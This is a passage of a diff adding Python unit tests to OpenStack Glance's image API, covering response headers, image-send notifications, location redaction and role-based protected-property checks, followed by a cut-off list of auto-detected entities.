self.context + response = webob.Response(request=req) + self.serializer.meta(response, FIXTURE) + self.assertNotEqual(type(FIXTURE['image_meta']['name']), + type(response.headers['x-image-meta-name'])) + self.assertEqual(response.headers['x-image-meta-name'].decode('utf-8'), + FIXTURE['image_meta']['name']) + for key, value in exp_headers.iteritems(): + self.assertEquals(value, response.headers[key]) + + FIXTURE['image_meta']['properties'][u'prop_bad'] = 'çé' + self.assertRaises(UnicodeDecodeError, + self.serializer.meta, response, FIXTURE) + + def test_show(self): + exp_headers = {'x-image-meta-id': UUID2, + 'x-image-meta-location': 'file:///tmp/glance-tests/2', + 'ETag': self.FIXTURE['image_meta']['checksum'], + 'x-image-meta-name': 'fake image #2'} + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'GET' + req.context = self.context + response = webob.Response(request=req) + self.serializer.show(response, self.FIXTURE) + for key, value in exp_headers.iteritems(): + self.assertEquals(value, response.headers[key]) + + self.assertEqual(response.body, 'chunk67891123456789') + + def test_show_notify(self): + """"""Make sure an eventlet posthook for notify_image_sent is added."""""" + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'GET' + req.context = self.context + response = webob.Response(request=req) + response.request.environ['eventlet.posthooks'] = [] + + self.serializer.show(response, self.FIXTURE) + + #just make sure the app_iter is called + for chunk in response.app_iter: + pass + + self.assertNotEqual(response.request.environ['eventlet.posthooks'], []) + + def test_image_send_notification(self): + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'GET' + req.remote_addr = '127.0.0.1' + req.context = self.context + + image_meta = self.FIXTURE['image_meta'] + called = {""notified"": False} + expected_payload = { + 'bytes_sent': 19, + 'image_id': UUID2, + 'owner_id': image_meta['owner'], + 'receiver_tenant_id': self.receiving_tenant, + 'receiver_user_id': self.receiving_user, + 'destination_ip': '127.0.0.1', + } + + def fake_info(_event_type, _payload): + self.assertEqual(_payload, expected_payload) + called['notified'] = True + + self.stubs.Set(self.serializer.notifier, 'info', fake_info) + + glance.api.common.image_send_notification(19, 19, image_meta, req, + self.serializer.notifier) + + self.assertTrue(called['notified']) + + def test_image_send_notification_error(self): + """"""Ensure image.send notification is sent on error."""""" + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'GET' + req.remote_addr = '127.0.0.1' + req.context = self.context + + image_meta = self.FIXTURE['image_meta'] + called = {""notified"": False} + expected_payload = { + 'bytes_sent': 17, + 'image_id': UUID2, + 'owner_id': image_meta['owner'], + 'receiver_tenant_id': self.receiving_tenant, + 'receiver_user_id': self.receiving_user, + 'destination_ip': '127.0.0.1', + } + + def fake_error(_event_type, _payload): + self.assertEqual(_payload, expected_payload) + called['notified'] = True + + self.stubs.Set(self.serializer.notifier, 'error', fake_error) + + #expected and actually sent bytes differ + glance.api.common.image_send_notification(17, 19, image_meta, req, + self.serializer.notifier) + + self.assertTrue(called['notified']) + + def test_redact_location(self): + """"""Ensure location redaction does not change original metadata"""""" + image_meta = {'size': 3, 'id': '123', 'location': 'http://localhost'} + redacted_image_meta = {'size': 3, 'id': '123'} + copy_image_meta = copy.deepcopy(image_meta) + tmp_image_meta = glance.api.v1.images.redact_loc(image_meta) + + self.assertEqual(image_meta, copy_image_meta) + self.assertEqual(tmp_image_meta, redacted_image_meta) + + def test_noop_redact_location(self): + """"""Check no-op location redaction does not change original metadata"""""" + image_meta = {'size': 3, 'id': '123'} + redacted_image_meta = {'size': 3, 'id': '123'} + copy_image_meta = copy.deepcopy(image_meta) + tmp_image_meta = glance.api.v1.images.redact_loc(image_meta) + + self.assertEqual(image_meta, copy_image_meta) + self.assertEqual(tmp_image_meta, redacted_image_meta) + self.assertEqual(image_meta, redacted_image_meta) + + +class TestFilterValidator(base.IsolatedUnitTest): + def test_filter_validator(self): + self.assertFalse(glance.api.v1.filters.validate('size_max', -1)) + self.assertTrue(glance.api.v1.filters.validate('size_max', 1)) + self.assertTrue(glance.api.v1.filters.validate('protected', 'True')) + self.assertTrue(glance.api.v1.filters.validate('protected', 'FALSE')) + self.assertFalse(glance.api.v1.filters.validate('protected', '-1')) + + +class TestAPIProtectedProps(base.IsolatedUnitTest): + def setUp(self): + """"""Establish a clean test environment"""""" + super(TestAPIProtectedProps, self).setUp() + self.mapper = routes.Mapper() + # turn on property protections + self.set_property_protections() + self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper)) + db_api.setup_db_env() + db_api.get_engine() + db_models.unregister_models(db_api._ENGINE) + db_models.register_models(db_api._ENGINE) + + def tearDown(self): + """"""Clear the test environment"""""" + super(TestAPIProtectedProps, self).tearDown() + self.destroy_fixtures() + + def destroy_fixtures(self): + # Easiest to just drop the models and re-create them... + db_models.unregister_models(db_api._ENGINE) + db_models.register_models(db_api._ENGINE) + + def _create_admin_image(self, props={}): + request = unit_test_utils.get_fake_request(path='/images') + headers = {'x-image-meta-disk-format': 'ami', + 'x-image-meta-container-format': 'ami', + 'x-image-meta-name': 'foo', + 'x-image-meta-size': '0', + 'x-auth-token': 'user:tenant:admin'} + headers.update(props) + for k, v in headers.iteritems(): + request.headers[k] = v + created_image = request.get_response(self.api) + res_body = json.loads(created_image.body)['image'] + image_id = res_body['id'] + return image_id + + def test_prop_protection_with_create_and_permitted_role(self): + """""" + As admin role, create and image and verify permitted role 'member' can + create a protected property + """""" + image_id = self._create_admin_image() + another_request = unit_test_utils.get_fake_request( + path='/images/%s' % image_id, method='PUT') + headers = {'x-auth-token': 'user:tenant:member', + 'x-image-meta-property-x_owner_foo': 'bar'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + res_body = json.loads(output.body)['image'] + self.assertEqual(res_body['properties']['x_owner_foo'], 'bar') + + def test_prop_protection_with_create_and_unpermitted_role(self): + """""" + As admin role, create an image and verify unpermitted role + 'fake_member' can *not* create a protected property + """""" + image_id = self._create_admin_image() + another_request = unit_test_utils.get_fake_request( + path='/images/%s' % image_id, method='PUT') + headers = {'x-auth-token': 'user:tenant:fake_member', + 'x-image-meta-property-x_owner_foo': 'bar'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + another_request.get_response(self.api) + output = another_request.get_response(self.api) + self.assertEquals(output.status_int, webob.exc.HTTPForbidden.code) + self.assertIn(""Property '%s' is protected"" % + ""x_owner_foo"", output.body) + + def test_prop_protection_with_show_and_permitted_role(self): + """""" + As admin role, create an image with a protected property, and verify + permitted role 'member' can read that protected property via HEAD + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-x_owner_foo': 'bar'}) + another_request = unit_test_utils.get_fake_request( + method='HEAD', path='/images/%s' % image_id) + headers = {'x-auth-token': 'user:tenant:member'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + res2 = another_request.get_response(self.api) + self.assertEqual(res2.headers['x-image-meta-property-x_owner_foo'], + 'bar') + + def test_prop_protection_with_show_and_unpermitted_role(self): + """""" + As admin role, create an image with a protected property, and verify + permitted role 'fake_role' can *not* read that protected property via + HEAD + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-x_owner_foo': 'bar'}) + another_request = unit_test_utils.get_fake_request( + method='HEAD', path='/images/%s' % image_id) + headers = {'x-auth-token': 'user:tenant:fake_role'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + self.assertEqual(output.status_int, 200) + self.assertEqual('', output.body) + self.assertNotIn('x-image-meta-property-x_owner_foo', output.headers) + + def test_prop_protection_with_get_and_permitted_role(self): + """""" + As admin role, create an image with a protected property, and verify + permitted role 'member' can read that protected property via GET + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-x_owner_foo': 'bar'}) + another_request = unit_test_utils.get_fake_request( + method='GET', path='/images/%s' % image_id) + headers = {'x-auth-token': 'user:tenant:member'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + res2 = another_request.get_response(self.api) + self.assertEqual(res2.headers['x-image-meta-property-x_owner_foo'], + 'bar') + + def test_prop_protection_with_get_and_unpermitted_role(self): + """""" + As admin role, create an image with a protected property, and verify + permitted role 'fake_role' can *not* read that protected property via + GET + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-x_owner_foo': 'bar'}) + another_request = unit_test_utils.get_fake_request( + method='GET', path='/images/%s' % image_id) + headers = {'x-auth-token': 'user:tenant:fake_role'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + self.assertEqual(output.status_int, 200) + self.assertEqual('', output.body) + self.assertNotIn('x-image-meta-property-x_owner_foo', output.headers) + + def test_prop_protection_with_detail_and_permitted_role(self): + """""" + As admin role, create an image with a protected property, and verify + permitted role 'member' can read that protected property via + /images/detail + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-x_owner_foo': 'bar'}) + another_request = unit_test_utils.get_fake_request( + method='GET', path='/images/detail') + headers = {'x-auth-token': 'user:tenant:member'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + self.assertEqual(output.status_int, 200) + res_body = json.loads(output.body)['images'][0] + self.assertEqual(res_body['properties']['x_owner_foo'], 'bar') + + def test_prop_protection_with_detail_and_unpermitted_role(self): + """""" + As admin role, create an image with a protected property, and verify + permitted role 'fake_role' can *not* read that protected property via + /images/detail + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-x_owner_foo': 'bar'}) + another_request = unit_test_utils.get_fake_request( + method='GET', path='/images/detail') + headers = {'x-auth-token': 'user:tenant:fake_role'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + self.assertEqual(output.status_int, 200) + res_body = json.loads(output.body)['images'][0] + self.assertNotIn('x-image-meta-property-x_owner_foo', + res_body['properties']) + + def test_prop_protection_with_update_and_permitted_role(self): + """""" + As admin role, create an image with protected property, and verify + permitted role 'member' can update that protected property + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-x_owner_foo': 'bar'}) + another_request = unit_test_utils.get_fake_request( + path='/images/%s' % image_id, method='PUT') + headers = {'x-auth-token': 'user:tenant:member', + 'x-image-meta-property-x_owner_foo': 'baz'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + res_body = json.loads(output.body)['image'] + self.assertEqual(res_body['properties']['x_owner_foo'], 'baz') + + def test_prop_protection_with_update_and_unpermitted_role(self): + """""" + As admin role, create an image with protected property, and verify + unpermitted role 'fake_role' can *not* update that protected property + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-x_owner_foo': 'bar'}) + another_request = unit_test_utils.get_fake_request( + path='/images/%s' % image_id, method='PUT') + headers = {'x-auth-token': 'user:tenant:fake_role', + 'x-image-meta-property-x_owner_foo': 'baz'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + self.assertEquals(output.status_int, webob.exc.HTTPForbidden.code) + self.assertIn(""Property '%s' is protected"" % + ""x_owner_foo"", output.body) + + def test_prop_protection_update_without_read(self): + """""" + Test protected property cannot be updated without read permission + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-spl_update_only_prop': 'foo'}) + another_request = unit_test_utils.get_fake_request( + path='/images/%s' % image_id, method='PUT') + headers = {'x-auth-token': 'user:tenant:spl_role', + 'x-image-meta-property-spl_update_only_prop': 'bar'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + self.assertEquals(output.status_int, webob.exc.HTTPForbidden.code) + self.assertIn(""Property '%s' is protected"" % + ""spl_update_only_prop"", output.body) + + def test_prop_protection_update_noop(self): + """""" + Test protected property update is allowed as long as the user has read + access and the value is unchanged + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-spl_read_prop': 'foo'}) + another_request = unit_test_utils.get_fake_request( + path='/images/%s' % image_id, method='PUT') + headers = {'x-auth-token': 'user:tenant:spl_role', + 'x-image-meta-property-spl_read_prop': 'foo'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + res_body = json.loads(output.body)['image'] + self.assertEqual(res_body['properties']['spl_read_prop'], 'foo') + self.assertEquals(output.status_int, 200) + + def test_prop_protection_with_delete_and_permitted_role(self): + """""" + As admin role, create an image with protected property, and verify + permitted role 'member' can can delete that protected property + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-x_owner_foo': 'bar'}) + another_request = unit_test_utils.get_fake_request( + path='/images/%s' % image_id, method='PUT') + headers = {'x-auth-token': 'user:tenant:member', + 'X-Glance-Registry-Purge-Props': 'True'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + res_body = json.loads(output.body)['image'] + self.assertEqual(res_body['properties'], {}) + + def test_prop_protection_with_delete_and_unpermitted_read(self): + """""" + Test protected property cannot be deleted without read permission + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-x_owner_foo': 'bar'}) + + another_request = unit_test_utils.get_fake_request( + path='/images/%s' % image_id, method='PUT') + headers = {'x-auth-token': 'user:tenant:fake_role', + 'X-Glance-Registry-Purge-Props': 'True'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + self.assertEquals(output.status_int, 200) + self.assertNotIn('x-image-meta-property-x_owner_foo', output.headers) + + another_request = unit_test_utils.get_fake_request( + method='HEAD', path='/images/%s' % image_id) + headers = {'x-auth-token': 'user:tenant:admin'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + self.assertEqual(output.status_int, 200) + self.assertEqual('', output.body) + self.assertEqual(output.headers['x-image-meta-property-x_owner_foo'], + 'bar') + + def test_prop_protection_with_delete_and_unpermitted_delete(self): + """""" + Test protected property cannot be deleted without delete permission + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-spl_update_prop': 'foo'}) + + another_request = unit_test_utils.get_fake_request( + path='/images/%s' % image_id, method='PUT') + headers = {'x-auth-token': 'user:tenant:spl_role', + 'X-Glance-Registry-Purge-Props': 'True'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + self.assertEquals(output.status_int, 403) + self.assertIn(""Property '%s' is protected"" % + ""spl_update_prop"", output.body) + + another_request = unit_test_utils.get_fake_request( + method='HEAD', path='/images/%s' % image_id) + headers = {'x-auth-token': 'user:tenant:admin'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + self.assertEqual(output.status_int, 200) + self.assertEqual('', output.body) + self.assertEqual( + output.headers['x-image-meta-property-spl_update_prop'], 'foo') + + def test_read_protected_props_leak_with_update(self): + """""" + Verify when updating props that ones we don't have read permission for + are not disclosed + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-spl_update_prop': '0', + 'x-image-meta-property-foo': 'bar'}) + another_request = unit_test_utils.get_fake_request( + path='/images/%s' % image_id, method='PUT') + headers = {'x-auth-token': 'user:tenant:spl_role', + 'x-image-meta-property-spl_update_prop': '1', + 'X-Glance-Registry-Purge-Props': 'False'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + res_body = json.loads(output.body)['image'] + self.assertEqual(res_body['properties']['spl_update_prop'], '1') + self.assertNotIn('foo', res_body['properties']) + + def test_update_protected_props_mix_no_read(self): + """""" + Create an image with two props - one only readable by admin, and one + readable/updatable by member. Verify member can sucessfully update + their property while the admin owned one is ignored transparently + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-admin_foo': 'bar', + 'x-image-meta-property-x_owner_foo': 'bar'}) + another_request = unit_test_utils.get_fake_request( + path='/images/%s' % image_id, method='PUT') + headers = {'x-auth-token': 'user:tenant:member', + 'x-image-meta-property-x_owner_foo': 'baz'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + res_body = json.loads(output.body)['image'] + self.assertEqual(res_body['properties']['x_owner_foo'], 'baz') + self.assertNotIn('admin_foo', res_body['properties']) + + def test_update_protected_props_mix_read(self): + """""" + Create an image with two props - one readable/updatable by admin, but + also readable by spl_role. The other is readable/updatable by + spl_role. Verify spl_role can successfully update their property but + not the admin owned one + """""" + custom_props = { + 'x-image-meta-property-spl_read_only_prop': '1', + 'x-image-meta-property-spl_update_prop': '2' + } + image_id = self._create_admin_image(custom_props) + another_request = unit_test_utils.get_fake_request( + path='/images/%s' % image_id, method='PUT') + + # verify spl_role can update it's prop + headers = {'x-auth-token': 'user:tenant:spl_role', + 'x-image-meta-property-spl_read_only_prop': '1', + 'x-image-meta-property-spl_update_prop': '1'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + res_body = json.loads(output.body)['image'] + self.assertEqual(output.status_int, 200) + self.assertEqual(res_body['properties']['spl_read_only_prop'], '1') + self.assertEqual(res_body['properties']['spl_update_prop'], '1') + + # verify spl_role can not update admin controlled prop + headers = {'x-auth-token': 'user:tenant:spl_role', + 'x-image-meta-property-spl_read_only_prop': '2', + 'x-image-meta-property-spl_update_prop': '1'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + self.assertEqual(output.status_int, 403) + + def test_delete_protected_props_mix_no_read(self): + """""" + Create an image with two props - one only readable by admin, and one + readable/deletable by member. Verify member can sucessfully delete + their property while the admin owned one is ignored transparently + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-admin_foo': 'bar', + 'x-image-meta-property-x_owner_foo': 'bar'}) + another_request = unit_test_utils.get_fake_request( + path='/images/%s' % image_id, method='PUT') + headers = {'x-auth-token': 'user:tenant:member', + 'X-Glance-Registry-Purge-Props': 'True'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + res_body = json.loads(output.body)['image'] + self.assertNotIn('x_owner_foo', res_body['properties']) + self.assertNotIn('admin_foo', res_body['properties']) + + def test_delete_protected_props_mix_read(self): + """""" + Create an image with two props - one readable/deletable by admin, but + also readable by spl_role. The other is readable/deletable by + spl_role. Verify spl_role is forbidden to purge_props in this scenario + without retaining the readable prop. + """""" + custom_props = { + 'x-image-meta-property-spl_read_only_prop': '1', + 'x-image-meta-property-spl_delete_prop': '2' + } + image_id = self._create_admin_image(custom_props) + another_request = unit_test_utils.get_fake_request( + path='/images/%s' % image_id, method='PUT') + headers = {'x-auth-token': 'user:tenant:spl_role', + 'X-Glance-Registry-Purge-Props': 'True'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + self.assertEqual(output.status_int, 403) +",119145,"[['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['DATE_TIME', '2010-2011'], ['PERSON', 'glance.db.sqlalchemy'], ['PERSON', 'db_api'], ['PERSON', 'glance.db.sqlalchemy'], ['PERSON', 'CONF\n\n_'], ['PERSON', 'TestGlanceAPI(base'], ['PERSON', 'FIXTURES'], ['PERSON', 'FIXTURES'], ['LOCATION', 'self.test_dir'], ['PERSON', 'ari'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['LOCATION', 'res.body'], ['LOCATION', 'res.body'], ['LOCATION', 'res.body'], ['PERSON', 'ari'], ['PERSON', 'ami'], ['LOCATION', 'res.body'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'qcow2'], ['PERSON', 'qcow2'], ['PERSON', 'FIXTURES'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['URL', 'self.as'], ['URL', 'self.co'], ['URL', 'self.co'], ['URL', 'self.co'], ['URL', 'self.co'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['LOCATION', 'Request.blank(""/images/%s'], ['URL', 'req.ge'], ['PERSON', 'test_show_non_exists_image(self'], ['NRP', 'memb_list'], ['NRP', 'memb_list'], ['PERSON', 'FakeAuthMiddleware'], ['NRP', 'memb_list'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['DATE_TIME', 'FakeAuthMiddleware(test_router'], ['DATE_TIME', 'FakeAuthMiddleware(test_router'], ['DATE_TIME', 'FakeAuthMiddleware(test_router'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'api = test_utils'], ['DATE_TIME', 'FakeAuthMiddleware(test_router'], ['PERSON', 'api = test_utils'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'ImageSerializer'], ['PERSON', '678911234'], ['PERSON', 'marche'], ['PERSON', 'FIXTURE'], ['PERSON', 'FIXTURE'], ['PERSON', 'FIXTURE'], ['DATE_TIME', '19'], ['DATE_TIME', '19'], ['PERSON', 'copy_image_meta = copy.deepcopy(image_meta'], ['PERSON', 'copy_image_meta = copy.deepcopy(image_meta'], ['LOCATION', 'TestFilterValidator(base'], ['LOCATION', 'TestAPIProtectedProps(base'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'output.body'], ['PERSON', 'output.body'], ['PERSON', 'output.body'], ['PERSON', 'output.body'], ['URL', 'http://www.apache.org/licenses/LICENSE-2.0'], ['URL', ""http://example.com/image.tar.gz',""], ['URL', ""http://example.com/image.tar.gz',""], ['URL', ""http://example.com/images/123'""], ['URL', ""http://glance.com/i.ovf',""], ['URL', ""http://glance.com/i.ovf',""], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'oslo.co'], ['URL', 'glance.api.com'], ['URL', 'glance.com'], ['URL', 'glance.common.co'], ['URL', 'glance.co'], ['URL', 'glance.openstack.com'], ['URL', 'glance.openstack.com'], ['URL', 'glance.store.fi'], ['URL', 'cfg.CO'], ['URL', 'uuidutils.ge'], ['URL', 'base.Is'], ['URL', 'self.ma'], ['URL', 'routes.Ma'], ['URL', 'self.ma'], ['URL', 'self.FI'], ['URL', 'self.co'], ['URL', 'glance.context.Re'], ['URL', 'api.se'], ['URL', 'api.ge'], ['URL', 'self.de'], ['URL', 'self.cr'], ['URL', 'self.de'], ['URL', 'self.FI'], ['URL', 'api.im'], ['URL', 'self.co'], ['URL', 'models.re'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'res.bo'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'res.bo'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'CONF.im'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'StringIO.St'], ['URL', 'CONF.im'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'CONF.im'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.FI'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.stubs.Se'], ['URL', 'glance.api.v1.im'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 